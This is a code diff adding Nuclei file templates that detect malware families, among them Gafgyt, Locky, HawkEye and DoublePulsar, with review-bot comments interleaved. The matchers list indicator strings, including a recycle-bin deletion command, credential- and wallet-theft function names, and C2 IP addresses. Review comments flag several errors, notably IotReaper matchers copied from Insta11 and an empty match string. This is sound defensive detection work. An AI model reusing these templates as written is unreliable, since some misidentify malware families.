+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_DiamondFox.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - 'UPDATE_B'
+ - 'UNISTALL_B'
+ - 'S_PROTECT'
+ - 'P_WALLET'
+ - 'GR_COMMAND'
+ - 'FTPUPLOAD'
+ condition: and
\ No newline at end of file
diff --git a/file/malware/dmalocker-malware.yaml b/file/malware/dmalocker-malware.yaml
new file mode 100644
index 0000000000..da1c8fc556
--- /dev/null
+++ b/file/malware/dmalocker-malware.yaml
@@ -0,0 +1,22 @@
+id: dmalocker-malware
+
+info:
+ name: DMA Locker Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_DMALocker.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: binary
+ binary:
+ - "41424358595a3131"
+ - "21444d414c4f434b"
+ - "21444d414c4f434b332e30"
+ - "3F520000FFFFFFFF06000000524C4141"
+ - "21444d414c4f434b342e30"
+ condition: or
diff --git a/file/malware/doublepulsar-malware.yaml b/file/malware/doublepulsar-malware.yaml
new file mode 100644
index 0000000000..f75042ae22
--- /dev/null
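Review bot: The fourth `binary` entry in dmalocker-malware.yaml, `3F520000FFFFFFFF06000000524C4141`, is byte-for-byte one of the slices listed in cryptxxx-malware.yaml. Under `condition: or` it is enough for a DMA Locker hit by itself, so a file carrying that CryptXXX slice would be reported as both families. It looks like a paste from the neighbouring template and should be checked against the referenced YARA rule before merging. Separately, `21444d414c4f434b` is a prefix of the two longer `21444d414c4f434b…` entries, so with `or` those two never change the result.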
+++ b/file/malware/doublepulsar-malware.yaml @@ -0,0 +1,19 @@ +id: doublepulsar-malware + +info: + name: DoublePulsar Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_DoublePulsar_Petya.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "FD0C8C5CB8C424C5CCCCCC0EE8CC246BCCCCCC0F24CDCCCCCC275C9775BACDCCCCC3FE" + - "45208D938D928D918D90929391970F9F9E9D99844529844D20CCCDCCCC9B844503844514844549CC3333332477CCCCCC844549C43333332484CDCCCC844549DC333333844749CC333333844741" + condition: or \ No newline at end of file diff --git a/file/malware/eicar-malware.yaml b/file/malware/eicar-malware.yaml new file mode 100644 index 0000000000..efdae29c31 --- /dev/null +++ b/file/malware/eicar-malware.yaml @@ -0,0 +1,18 @@ +id: eicar-malware + +info: + name: Eicar Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Eicar.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" \ No newline at end of file diff --git a/file/malware/erebus-malware.yaml b/file/malware/erebus-malware.yaml new file mode 100644 index 0000000000..bf34157061 --- /dev/null +++ b/file/malware/erebus-malware.yaml @@ -0,0 +1,20 @@ +id: erebus-malware + +info: + name: Erebus Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Erebus.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "/{5f58d6f0-bb9c-46e2-a4da-8ebc746f24a5}//log.log" + - "EREBUS IS BEST." + condition: and \ No newline at end of file diff --git a/file/malware/ezcob-malware.yaml b/file/malware/ezcob-malware.yaml new file mode 100644 index 0000000000..8aa21c0505 --- /dev/null 
+++ b/file/malware/ezcob-malware.yaml @@ -0,0 +1,23 @@ +id: ezcob-malware + +info: + name: Ezcob Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Ezcob.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - '\x12F\x12F\x129\x12E\x12A\x12E\x12B\x12A\x12-\x127\x127\x128\x123\x12' + - '\x121\x12D\x128\x123\x12B\x122\x12E\x128\x12-\x12B\x122\x123\x12D\x12' + - 'Ezcob' + - 'l\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x126' + - '20110113144935' + condition: or \ No newline at end of file diff --git a/file/malware/fudcrypt-malware.yaml b/file/malware/fudcrypt-malware.yaml new file mode 100644 index 0000000000..1a257fd1ce --- /dev/null +++ b/file/malware/fudcrypt-malware.yaml @@ -0,0 +1,31 @@ +id: fudcrypt-malware + +info: + name: FUDCrypt Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/gigajew/FudCrypt/ + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_FUDCrypt.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'OcYjzPUtJkNbLOABqYvNbvhZf' + - 'gwiXxyIDDtoYzgMSRGMckRbJi' + - 'BclWgISTcaGjnwrzSCIuKruKm' + - 'CJyUSiUNrIVbgksjxpAMUkAJJ' + - 'fAMVdoPUEyHEWdxQIEJPRYbEN' + - 'CIGQUctdcUPqUjoucmcoffECY' + - 'wcZfHOgetgAExzSoWFJFQdAyO' + - 'DqYKDnIoLeZDWYlQWoxZnpfPR' + - 'MkhMoOHCbGUMqtnRDJKnBYnOj' + - 'sHEqLMGglkBAOIUfcSAgMvZfs' + - 'JtZApJhbFAIFxzHLjjyEQvtgd' + - 'IIQrSWZEMmoQIKGuxxwoTwXka' \ No newline at end of file diff --git a/file/malware/gafgyt-bash-malware.yaml b/file/malware/gafgyt-bash-malware.yaml new file mode 100644 index 0000000000..89b33c0f3d --- /dev/null +++ b/file/malware/gafgyt-bash-malware.yaml 
@@ -0,0 +1,22 @@
+id: gafgyt-bash-malware
+
+info:
+ name: Gafgyt Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - 'PONG!'
+ - 'GETLOCALIP'
+ - 'HTTPFLOOD'
+ - 'LUCKYLILDUDE'
+ condition: and
\ No newline at end of file
diff --git a/file/malware/gafgyt-generic-malware.yaml b/file/malware/gafgyt-generic-malware.yaml
new file mode 100644
index 0000000000..0f1cf80b47
--- /dev/null
+++ b/file/malware/gafgyt-generic-malware.yaml
@@ -0,0 +1,22 @@
+id: gafgyt-generic-malware
+
+info:
+ name: Gafgyt Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "/bin/busybox;echo -e 'gayfgt'"
+ - '/proc/net/route'
+ - 'admin'
+ - 'root'
+ condition: and
\ No newline at end of file
diff --git a/file/malware/gafgyt-hihi-malware.yaml b/file/malware/gafgyt-hihi-malware.yaml
new file mode 100644
index 0000000000..61375a18ac
--- /dev/null
+++ b/file/malware/gafgyt-hihi-malware.yaml
@@ -0,0 +1,24 @@
+id: gafgyt-hihi-malware
+
+info:
+ name: Gafgyt Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - 'PING'
+ - 'PONG'
+ - 'TELNET LOGIN CRACKED - %s:%s:%s'
+ - 'ADVANCEDBOT'
+ - '46.166.185.92'
+ - 'LOLNOGTFO'
+ condition: and
\ No newline at end of file
diff --git a/file/malware/gafgyt-hoho-malware.yaml b/file/malware/gafgyt-hoho-malware.yaml
new file mode 100644
index 0000000000..f41ce24284
--- /dev/null
+++ b/file/malware/gafgyt-hoho-malware.yaml
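Review bot: `name: Gafgyt Malware - Detect` is identical in gafgyt-bash, gafgyt-generic, gafgyt-hihi, gafgyt-hoho and gafgyt-jackmy, so a hit reported by name cannot be tied to a variant without the template id. gafgyt-oh-malware.yaml already uses `Gafgyt Oh Malware - Detect`; the others could follow it, e.g. `name: Gafgyt Bash Malware - Detect`. An `info.description` line stating which strings distinguish each variant would also help triage.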
@@ -0,0 +1,22 @@
+id: gafgyt-hoho-malware
+
+info:
+ name: Gafgyt Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - 'PING'
+ - 'PRIVMSG'
+ - 'Remote IRC Bot'
+ - '23.95.43.182'
+ condition: and
\ No newline at end of file
diff --git a/file/malware/gafgyt-jackmy-malware.yaml b/file/malware/gafgyt-jackmy-malware.yaml
new file mode 100644
index 0000000000..5db0722050
--- /dev/null
+++ b/file/malware/gafgyt-jackmy-malware.yaml
@@ -0,0 +1,22 @@
+id: gafgyt-jackmy-malware
+
+info:
+ name: Gafgyt Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - 'PING'
+ - 'PONG'
+ - 'jackmy'
+ - '203.134.%d.%d'
+ condition: and
\ No newline at end of file
diff --git a/file/malware/gafgyt-oh-malware.yaml b/file/malware/gafgyt-oh-malware.yaml
new file mode 100644
index 0000000000..1fbc949209
--- /dev/null
+++ b/file/malware/gafgyt-oh-malware.yaml
@@ -0,0 +1,22 @@
+id: gafgyt-oh-malware
+
+info:
+ name: Gafgyt Oh Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - 'busyboxterrorist'
+ - 'BOGOMIPS'
+ - '124.105.97.%d'
+ - 'fucknet'
+ condition: and
\ No newline at end of file
diff --git a/file/malware/genome-malware.yaml b/file/malware/genome-malware.yaml
new file mode 100644
index 0000000000..4d2f018030
--- /dev/null
+++ b/file/malware/genome-malware.yaml
@@ -0,0 +1,21 @@
+id: genome-malware
+
+info:
+ name: Genome Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Genome.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - 'Attempting to create more than one keyboard::Monitor instance'
+ - '{Right windows}'
+ - 'Access violation - no RTTI data!'
+ condition: and
\ No newline at end of file
diff --git a/file/malware/glass-malware.yaml b/file/malware/glass-malware.yaml
new file mode 100644
index 0000000000..4729c20f2d
--- /dev/null
+++ b/file/malware/glass-malware.yaml
@@ -0,0 +1,22 @@
+id: glass-malware
+
+info:
+ name: Glass Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Glass.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "PostQuitMessage"
+ - "pwlfnn10,gzg"
+ - "update.dll"
+ - "_winver"
+ condition: and
diff --git a/file/malware/glasses-malware.yaml b/file/malware/glasses-malware.yaml
new file mode 100644
index 0000000000..9dd8240a7d
--- /dev/null
+++ b/file/malware/glasses-malware.yaml
@@ -0,0 +1,30 @@
+id: glasses-malware
+
+info:
+ name: Glasses Malware - Detect
+ author: daffainfo
+ severity: info
+ reference:
+ - https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/
+ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Glasses.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - 'thequickbrownfxjmpsvalzydg'
+ - 'Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)'
+ - '" target="NewRef">'
+ condition: and
+
+ - type: binary
+ binary:
+ - "B8ABAAAAAAF7E1D1EA8D04522BC8"
+ - "B856555555F7E98B4C241C8BC2C1E81F03D0493BCA"
+ condition: or
\ No newline at end of file
diff --git a/file/malware/gozi-malware.yaml b/file/malware/gozi-malware.yaml
new file mode 100644
index 0000000000..0de45dd78e
--- /dev/null
+++ b/file/malware/gozi-malware.yaml
@@ -0,0 +1,19 @@
+id: gozi-malware
+
+info:
+ name: Gozi Malware - Detect
+ author: daffainfo
+ severity: info
+ reference:
+ - https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
+ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gozi.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: binary
+ binary:
+ - "63006F006F006B006900650073002E00730071006C006900740065002D006A006F00750072006E0061006C0000004F504552412E45584500"
\ No newline at end of file
diff --git a/file/malware/gpgqwerty-malware.yaml b/file/malware/gpgqwerty-malware.yaml
new file mode 100644
index 0000000000..98fc738eda
--- /dev/null
+++ b/file/malware/gpgqwerty-malware.yaml
@@ -0,0 +1,22 @@
+id: gpgqwerty-malware
+
+info:
+ name: GPGQwerty Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_GPGQwerty.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "gpg.exe –recipient qwerty -o"
+ - "%s%s.%d.qwerty"
+ - "del /Q /F /S %s$recycle.bin"
+ - "cryz1@protonmail.com"
+ condition: and
\ No newline at end of file
diff --git a/file/malware/greame-malware.yaml b/file/malware/greame-malware.yaml
new file mode 100644
index 0000000000..c87fb4e61f
--- /dev/null
+++ b/file/malware/greame-malware.yaml
@@ -0,0 +1,31 @@
+id: greame-malware
+
+info:
+ name: Greame Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "EditSvr"
+ - "TLoader"
+ - "Stroks"
+ - "Avenger by NhT"
+ - "####@####"
+ - "GREAME"
+ condition: and
+
+ - type: binary
+ binary:
+ - "232323234023232323E8EEE9F9232323234023232323"
+ - "232323234023232323FAFDF0EFF9232323234023232323"
+ condition: and
\ No newline at end of file
diff --git a/file/malware/grozlex-malware.yaml b/file/malware/grozlex-malware.yaml
new file mode 100644
index 0000000000..86893d6184
--- /dev/null
+++ b/file/malware/grozlex-malware.yaml
@@ -0,0 +1,19 @@
+id: grozlex-malware
+
+info:
+ name: Grozlex Malware - Detect
+ author: daffainfo
+ severity: info
+ reference:
+ - https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
+ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Grozlex.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: binary
+ binary:
+ - "4C006F00670073002000610074007400610063006800650064002000620079002000690043006F007A0065006E"
\ No newline at end of file
diff --git a/file/malware/hawkeye-malware.yaml b/file/malware/hawkeye-malware.yaml
new file mode 100644
index 0000000000..734d77c765
--- /dev/null
+++ b/file/malware/hawkeye-malware.yaml
@@ -0,0 +1,27 @@
+id: hawkeye-malware
+
+info:
+ name: HawkEye Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "HawkEyeKeylogger"
+ - "099u787978786"
+ - "HawkEye_Keylogger"
+ - "holdermail.txt"
+ - "wallet.dat"
+ - "Keylog Records"
+ - ""
+ - "\\pidloc.txt"
+ - "BSPLIT"
+ condition: and
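Review bot: The seventh `words` entry in hawkeye-malware.yaml is the empty string `""`, which carries no signal under `condition: and`: depending on how the engine treats an empty word it either matches every file or can never be satisfied. It looks like a string from the referenced YARA rule was lost in conversion (possibly markup that was stripped); restore it from `RAT_Ratdecoders.yar` or drop the entry. It is also worth confirming whether the upstream strings are declared `wide`: if so, a `word` match on `raw` looks for the ASCII form and would miss UTF-16 encoded samples, and a `binary` matcher with `00`-interleaved hex, as grozlex and gozi use, would be needed.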
diff --git a/file/malware/imminent-malware.yaml b/file/malware/imminent-malware.yaml
new file mode 100644
index 0000000000..e093fb86f8
--- /dev/null
+++ b/file/malware/imminent-malware.yaml
@@ -0,0 +1,37 @@
+id: imminent-malware
+
+info:
+ name: Imminent Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "DecodeProductKey"
+ - "StartHTTPFlood"
+ - "CodeKey"
+ - "MESSAGEBOX"
+ - "GetFilezillaPasswords"
+ - "DataIn"
+ - "UDPzSockets"
+ condition: and
+
+ - type: word
+ part: raw
+ words:
+ - "k__BackingField"
+ - "k__BackingField"
+ - "DownloadAndExecute"
+ - "england.png"
+ - "-CHECK & PING -n 2 127.0.0.1 & EXIT"
+ - "Showed Messagebox"
+ condition: and
\ No newline at end of file
diff --git a/file/malware/infinity-malware.yaml b/file/malware/infinity-malware.yaml
new file mode 100644
index 0000000000..e831343139
--- /dev/null
+++ b/file/malware/infinity-malware.yaml
@@ -0,0 +1,26 @@
+id: infinity-malware
+
+info:
+ name: Infinity Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "CRYPTPROTECT_PROMPTSTRUCT"
+ - "discomouse"
+ - "GetDeepInfo"
+ - "AES_Encrypt"
+ - "StartUDPFlood"
+ - "BATScripting"
+ - "FBqINhRdpgnqATxJ.html"
+ - "magic_key"
+ condition: and
\ No newline at end of file
diff --git a/file/malware/insta11-malware.yaml b/file/malware/insta11-malware.yaml
new file mode 100644
index 0000000000..97870e5da4
--- /dev/null
+++ b/file/malware/insta11-malware.yaml
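Review bot: In imminent-malware.yaml the second `words` block lists `"k__BackingField"` twice. The duplicate adds nothing under `condition: and`, and the bare suffix is the compiler-generated backing-field name found in .NET assemblies that use auto-properties, so it does not discriminate on its own. The two entries were probably distinct `<Name>k__BackingField` strings whose angle-bracket prefix was lost in conversion; verify against `RAT_Ratdecoders.yar` and restore the full property names.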
@@ -0,0 +1,28 @@
+id: insta11-malware
+
+info:
+ name: Insta11 Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Install11.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - 'XTALKER7'
+ - 'Insta11 Microsoft'
+ - 'wudMessage'
+ - 'ECD4FC4D-521C-11D0-B792-00A0C90312E1'
+ - 'B12AE898-D056-4378-A844-6D393FE37956'
+ condition: or
+
+ - type: binary
+ binary:
+ - 'E9000000006823040000'
\ No newline at end of file
diff --git a/file/malware/intel-virtualization-malware.yaml b/file/malware/intel-virtualization-malware.yaml
new file mode 100644
index 0000000000..650f218f8f
--- /dev/null
+++ b/file/malware/intel-virtualization-malware.yaml
@@ -0,0 +1,29 @@
+id: intel-virtualization-malware
+
+info:
+ name: Intel Virtualization Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Intel_Virtualization.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: and
+ matchers:
+ - type: binary
+ binary:
+ - '4C6F6164535452494E47'
+ - '496E697469616C697A654B6579486F6F6B'
+ - '46696E645265736F7572636573'
+ - '4C6F6164535452494E4746726F6D484B4355'
+ - '6863637574696C732E444C4C'
+ condition: and
+
+ - type: binary
+ binary:
+ - '483A5C466173745C506C756728686B636D64295C'
+ - '646C6C5C52656C656173655C48696A61636B446C6C2E706462'
+ condition: and
\ No newline at end of file
diff --git a/file/malware/iotreaper-malware.yaml b/file/malware/iotreaper-malware.yaml
new file mode 100644
index 0000000000..d64ea0d220
--- /dev/null
+++ b/file/malware/iotreaper-malware.yaml
@@ -0,0 +1,28 @@
+id: iotreaper-malware
+
+info:
+ name: IotReaper Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_IotReaper.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - 'XTALKER7'
+ - 'Insta11 Microsoft'
+ - 'wudMessage'
+ - 'ECD4FC4D-521C-11D0-B792-00A0C90312E1'
+ - 'B12AE898-D056-4378-A844-6D393FE37956'
+ condition: or
+
+ - type: binary
+ binary:
+ - 'E9000000006823040000'
\ No newline at end of file
diff --git a/file/malware/linux-aesddos-malware.yaml b/file/malware/linux-aesddos-malware.yaml
new file mode 100644
index 0000000000..389b681e8b
--- /dev/null
+++ b/file/malware/linux-aesddos-malware.yaml
@@ -0,0 +1,37 @@
+id: linux-aesddos-malware
+
+info:
+ name: Linux AESDDOS Malware - Detect
+ author: daffainfo
+ severity: info
+ reference:
+ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar
+ - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "3AES"
+ - "Hacker"
+ condition: and
+
+ - type: word
+ part: raw
+ words:
+ - "3AES"
+ - "VERSONEX"
+ condition: and
+
+ - type: word
+ part: raw
+ words:
+ - "VERSONEX"
+ - "Hacker"
+ condition: and
diff --git a/file/malware/linux-billgates-malware.yaml b/file/malware/linux-billgates-malware.yaml
new file mode 100644
index 0000000000..24ec63d673
--- /dev/null
+++ b/file/malware/linux-billgates-malware.yaml
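Review bot: The matchers in iotreaper-malware.yaml are an exact copy of those in insta11-malware.yaml (`XTALKER7`, `Insta11 Microsoft`, `wudMessage`, the two GUIDs and `E9000000006823040000`), so this template reports IotReaper on Insta11 indicators and contains no IotReaper-specific string. The words and binary values need to be replaced with the ones from the referenced `MALW_IotReaper.yar`. Until that is done the template should be held back, since a mislabelled family sends triage in the wrong direction.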
@@ -0,0 +1,22 @@
+id: linux-billgates-malware
+
+info:
+ name: Linux BillGates Malware - Detect
+ author: daffainfo
+ severity: info
+ reference:
+ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar
+ - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "12CUpdateGates"
+ - "11CUpdateBill"
+ condition: and
diff --git a/file/malware/linux-elknot-malware.yaml b/file/malware/linux-elknot-malware.yaml
new file mode 100644
index 0000000000..2a4e11bb7a
--- /dev/null
+++ b/file/malware/linux-elknot-malware.yaml
@@ -0,0 +1,22 @@
+id: linux-elknot-malware
+
+info:
+ name: Linux Elknot Malware - Detect
+ author: daffainfo
+ severity: info
+ reference:
+ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar
+ - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "ZN8CUtility7DeCryptEPciPKci"
+ - "ZN13CThreadAttack5StartEP11CCmdMessage"
+ condition: and
diff --git a/file/malware/linux-mrblack-malware.yaml b/file/malware/linux-mrblack-malware.yaml
new file mode 100644
index 0000000000..6b67dda9f9
--- /dev/null
+++ b/file/malware/linux-mrblack-malware.yaml
@@ -0,0 +1,22 @@
+id: linux-mrblack-malware
+
+info:
+ name: Linux MrBlack Malware - Detect
+ author: daffainfo
+ severity: info
+ reference:
+ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar
+ - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "Mr.Black"
+ - "VERS0NEX:%s|%d|%d|%s"
+ condition: and
diff --git a/file/malware/linux-tsunami-malware.yaml b/file/malware/linux-tsunami-malware.yaml
new file mode 100644
index 0000000000..2f89e2327e
--- /dev/null
+++ b/file/malware/linux-tsunami-malware.yaml
@@ -0,0 +1,22 @@
+id: linux-tsunami-malware
+
+info:
+ name: Linux Tsunami Malware - Detect
+ author: daffainfo
+ severity: info
+ reference:
+ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar
+ - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "PRIVMSG %s :[STD]Hitting %s"
+ - "NOTICE %s :TSUNAMI "
+ - "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually."
diff --git a/file/malware/locky-malware.yaml b/file/malware/locky-malware.yaml
new file mode 100644
index 0000000000..248e653c88
--- /dev/null
+++ b/file/malware/locky-malware.yaml
@@ -0,0 +1,31 @@
+id: locky-malware
+
+info:
+ name: Locky Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Locky.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: or
+ matchers:
+ - type: binary
+ binary:
+ - "45b899f7f90faf45b88945b8"
+ - "2b0a0faf4df8894df8c745"
+ condition: and
+
+ - type: binary
+ binary:
+ - "2E006C006F0063006B00790000"
+ - "005F004C006F0063006B007900"
+ - "5F007200650063006F00760065"
+ - "0072005F0069006E0073007400"
+ - "720075006300740069006F006E"
+ - "0073002E0074007800740000"
+ - "536F6674776172655C4C6F636B7900"
+ condition: and
\ No newline at end of file
diff --git a/file/malware/lostdoor-malware.yaml b/file/malware/lostdoor-malware.yaml
new file mode 100644
index 0000000000..e68a90d5b2
--- /dev/null
+++ b/file/malware/lostdoor-malware.yaml
@@ -0,0 +1,32 @@
+id: lostdoor-malware
+
+info:
+ name: LostDoor Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "*mlt* = %"
+ - "*ip* = %"
+ - "*victimo* = %"
+ - "*name* = %"
+ - "[START]"
+ - "[DATA]"
+ - "We Control Your Digital World"
+ - "RC4Initialize"
+ - "RC4Decrypt"
+ condition: and
+
+ - type: binary
+ binary:
+ - "0D0A2A454449545F5345525645522A0D0A"
\ No newline at end of file
diff --git a/file/malware/luminositylink-malware.yaml b/file/malware/luminositylink-malware.yaml
new file mode 100644
index 0000000000..f3076fb6af
--- /dev/null
+++ b/file/malware/luminositylink-malware.yaml
@@ -0,0 +1,29 @@
+id: luminositylink-malware
+
+info:
+ name: LuminosityLink Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "SMARTLOGS"
+ - "RUNPE"
+ - "b.Resources"
+ - "CLIENTINFO*"
+ - "Invalid Webcam Driver Download URL, or Failed to Download File!"
+ - "Proactive Anti-Malware has been manually activated!"
+ - "REMOVEGUARD"
+ - "C0n1f8"
+ - "Luminosity"
+ - "LuminosityCryptoMiner"
+ - "MANAGER*CLIENTDETAILS*"
+ condition: and
\ No newline at end of file
diff --git a/file/malware/luxnet-malware.yaml b/file/malware/luxnet-malware.yaml
new file mode 100644
index 0000000000..4fca112cf0
--- /dev/null
+++ b/file/malware/luxnet-malware.yaml
@@ -0,0 +1,24 @@
+id: luxnet-malware
+
+info:
+ name: LuxNet Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "GetHashCode"
+ - "Activator"
+ - "WebClient"
+ - "op_Equality"
+ - "dickcursor.cur"
+ - "{0}|{1}|{2}"
+ condition: and
\ No newline at end of file
diff --git a/file/malware/macgyver-installer-malware.yaml b/file/malware/macgyver-installer-malware.yaml
new file mode 100644
index 0000000000..ddad8de9c5
--- /dev/null
+++ b/file/malware/macgyver-installer-malware.yaml
@@ -0,0 +1,24 @@
+id: macgyver-installer-malware
+
+info:
+ name: MacGyver.cap Installer Malware - Detect
+ author: daffainfo
+ severity: info
+ reference:
+ - https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf
